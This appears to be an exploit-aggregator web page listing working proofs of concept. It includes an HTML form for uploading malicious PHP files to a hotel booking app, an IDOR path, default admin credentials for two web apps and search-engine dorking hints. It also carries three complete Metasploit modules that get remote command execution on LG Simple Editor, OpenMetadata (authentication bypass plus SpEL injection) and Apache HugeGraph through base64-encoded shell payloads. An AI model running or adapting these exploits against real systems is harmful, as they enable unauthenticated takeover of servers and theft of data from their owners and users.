Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : Hotel Booking System 1.0 Remote File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to remotely upload malicious PHP files directly. [+] Line 9 set url of target. [+] The path to upload the files : http://127.0.0.1/hotel/uploadImage\Profile [+] Save Code as html : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Image Upload Form</title> </head> <body> <form action="http://127.0.0.1/source%20code/profile.php" method="POST" enctype="multipart/form-data"> <label for="image">Upload an image:</label> <input type="file" id="image" name="image" accept="image/*" required> <button type="submit" name="btn_update">Upload</button> </form> </body> </html> [+] part 2 : infected item ( manage_website.php ) . [+] Line 9 set url of target. <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Update Website Images</title> </head> <body> <form action="http://127.0.0.1/source%20code/manage_website.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="old_website_image" value="current_website_image.jpg"> <label for="website_image">Upload new website image:</label> <input type="file" id="website_image" name="website_image" accept="image/*"> <input type="hidden" name="old_login_image" value="current_login_image.jpg"> <label for="login_image">Upload new login image:</label> <input type="file" id="login_image" name="login_image" accept="image/*"> <input type="hidden" name="old_back_login_image" value="current_back_login_image.jpg"> <label for="back_login_image">Upload new back login image:</label> <input type="file" id="back_login_image" name="back_login_image" accept="image/*"> <button type="submit" name="btn_web">Update Images</button> </form> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bhojon restaurant management system v3.0 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /dashboard/autoupdate [+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdate Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'LG Simple Editor Command Injection (CVE-2023-40504)', 'Description' => %q{ Unauthenticated Command Injection in LG Simple Editor <= v3.21.0. The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ 'rgod', # Vulnerability discovery 'Michael Heinzl' # MSF module ], 'References' => [ [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1208/'], [ 'CVE', '2023-40504'] ], 'DisclosureDate' => '2023-08-04', 'Platform' => 'win', 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Windows_Fetch', { 'Arch' => [ ARCH_CMD ], 'Platform' => 'win', 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' }, 'Type' => :win_fetch, 'Payload' => { 'BadChars' => '\\' } } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/']) ] ) end # Determine if the Simple Editor instance runs a vulnerable version # copied from lg_simple_editor_rce.rb def check res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do') } ) return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', '')) return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown' return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0') Exploit::CheckCode::Safe end def exploit execute_command(payload.encoded) end def execute_command(cmd) print_status('Sending command injection...') exec_simplerce(cmd) print_status('Exploit finished, check thy shell.') end # Send command injection def exec_simplerce(cmd) filename = Rex::Text.rand_text_alpha(1..6) vprint_status("Using random filename: #{filename}.mp4") form = Rex::MIME::Message.new form.add_part('/', nil, nil, "form-data; name=\"uploadVideo\"; filename=\"#{filename}.mp4\"") form.add_part("/\"&#{cmd}&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del #{filename}.mp4&/../", nil, nil, 'form-data; name="uploadPath"') form.add_part('1', nil, nil, 'form-data; name="uploadFile_x"') form.add_part('1', nil, nil, 'form-data; name="uploadFile_width"') form.add_part('1', nil, nil, 'form-data; name="uploadFile_height"') res = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadVideo.do'), 'ctype' => "multipart/form-data; boundary=#{form.bound}", 'data' => form.to_s } ) if res && res.code == 200 print_good 'Command injection sent.' else fail_with(Failure::UnexpectedReply, "#{peer}: Unexpected response received.") end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'OpenMetadata authentication bypass and SpEL injection exploit chain', 'Description' => %q{ OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. This module chains two vulnerabilities that exist in the OpenMetadata aplication. The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens. It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings that will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint. By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any authentication. OpenMetadata versions `1.2.3` and below are vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor 'Alvaro Muñoz alias pwntester (https://github.com/pwntester)' # Original discovery ], 'References' => [ ['CVE', '2024-28255'], ['CVE', '2024-28254'], ['URL', 'https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/'], ['URL', 'https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255'], ['URL', 'https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/'] ], 'DisclosureDate' => '2024-03-15', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Privileged' => false, 'Targets' => [ [ 'Automatic', { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'rport' => 8585, 'FETCH_COMMAND' => 'WGET' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'The URI path of the OpenMetadata web application', '/']) ] ) end def execute_command(cmd, _opts = {}) # list of paths that require no authentication unauthed_paths = [ '/api/v1;v1%2Fv1%2Fusers%2Flogin', '/api/v1;v1%2Fv1%2Fusers%2Fsignup', '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation', '/api/v1;v1%2Fv1%2Fusers%2FresendRegistrationToken', '/api/v1;v1%2Fv1%2Fusers%2FgeneratePasswordResetLink', '/api/v1;v1%2Fv1%2Fusers%2Fpassword%2Freset', '/api/v1;v1%2Fv1%2Fusers%2FcheckEmailInUse', '/api/v1;v1%2Fv1%2Fusers%2Frefresh', '/api/v1;v1%2Fv1%2Fsystem%2Fconfig', '/api/v1;v1%2Fv1%2Fsystem%2Fversion' ] # $@|sh – Getting a shell environment from Runtime.exec cmd = "sh -c $@|sh . echo #{cmd}" cmd_b64 = Base64.strict_encode64(cmd) spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))" unauthed_paths.shuffle!.each do |path| res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload), 'method' => 'GET' }) break if res.code == 400 && res.body.include?('EL1001E') end end def check print_status('Trying to detect if target is running a vulnerable version of OpenMetadata.') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'GET' }) return CheckCode::Unknown('Could not detect OpenMetadata.') unless res && res.code == 200 && res.body.include?('OpenMetadata') # try to dectect version res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'version'), 'method' => 'GET' }) return CheckCode::Detected('Could not retrieve the version information.') unless res && res.code == 200 # parse json response and get the version res_json = res.get_json_document unless res_json.blank? version = res_json['version'] version_number = Rex::Version.new(version.gsub(/[[:space:]]/, '')) unless version.nil? end return CheckCode::Detected('Could not retrieve the version information.') if version_number.nil? return CheckCode::Appears("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3') CheckCode::Safe("Version #{version_number}") end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") execute_command(payload.encoded) end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Apache HugeGraph Gremlin RCE', 'Description' => %q{ This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve RCE through Gremlin, resulting in complete control over the server }, 'Author' => [ '6right', # discovery 'jheysel-r7' # module ], 'References' => [ [ 'URL', 'https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/'], [ 'CVE', '2024-27348'] ], 'License' => MSF_LICENSE, 'Platform' => %w[unix linux], 'Privileged' => true, 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Automatic Target', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2024-04-22', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ ARTIFACTS_ON_DISK, ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Base path to the Apache HugeGraph web application', '/']) ]) end def check res = send_request_cgi({ 'method' => 'GET' }) return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res return CheckCode::Unknown("The response from the vulnerable endpoint /gremlin was: #{res.code} (expected: 200)") unless res.code == 200 version = res.get_json_document&.dig('version') return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0')) return CheckCode::Appears("Apache HugeGraph version detected: #{version}") end CheckCode::Safe("Apache HugeGraph version detected: #{version}") end def exploit print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}") class_name = rand_text_alpha(4..12) thread_name = rand_text_alpha(4..12) command_name = rand_text_alpha(4..12) process_builder_name = rand_text_alpha(4..12) start_method_name = rand_text_alpha(4..12) constructor_name = rand_text_alpha(4..12) field_name = rand_text_alpha(4..12) java_payload = <<~PAYLOAD Thread #{thread_name} = Thread.currentThread(); Class #{class_name} = Class.forName(\"java.lang.Thread\"); java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\"); #{field_name}.setAccessible(true); #{field_name}.set(#{thread_name}, \"#{thread_name}\"); Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\"); java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class); java.util.List #{command_name} = java.util.Arrays.asList(#{"bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash".strip.split(' ').map { |element| "\"#{element}\"" }.join(', ')}); Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name}); java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\"); #{start_method_name}.invoke(#{process_builder_name}); PAYLOAD data = { 'gremlin' => java_payload, 'bindings' => {}, 'language' => 'gremlin-groovy', 'aliases' => {} } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/gremlin'), 'method' => 'POST', 'ctype' => 'application/json', 'data' => data.to_json }) print_error('Unexpected response from the vulnerable exploit') unless res && res.code == 200 end end </code></pre>

<pre><code>==================================================================================================================================== | # Title : Feberr v13.4 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user&pass: admin [+] https://www/127.0.0.1/nexuscriptscom/admin/pwa-settings Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Ecommerce 1.15 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://demo.phpscriptpoint.com/ecommerce | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@gmail.com & pass = 1234 [+] https://www/127.0.0.1/demo/phpscriptpoint.com/ecommerce/admin Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>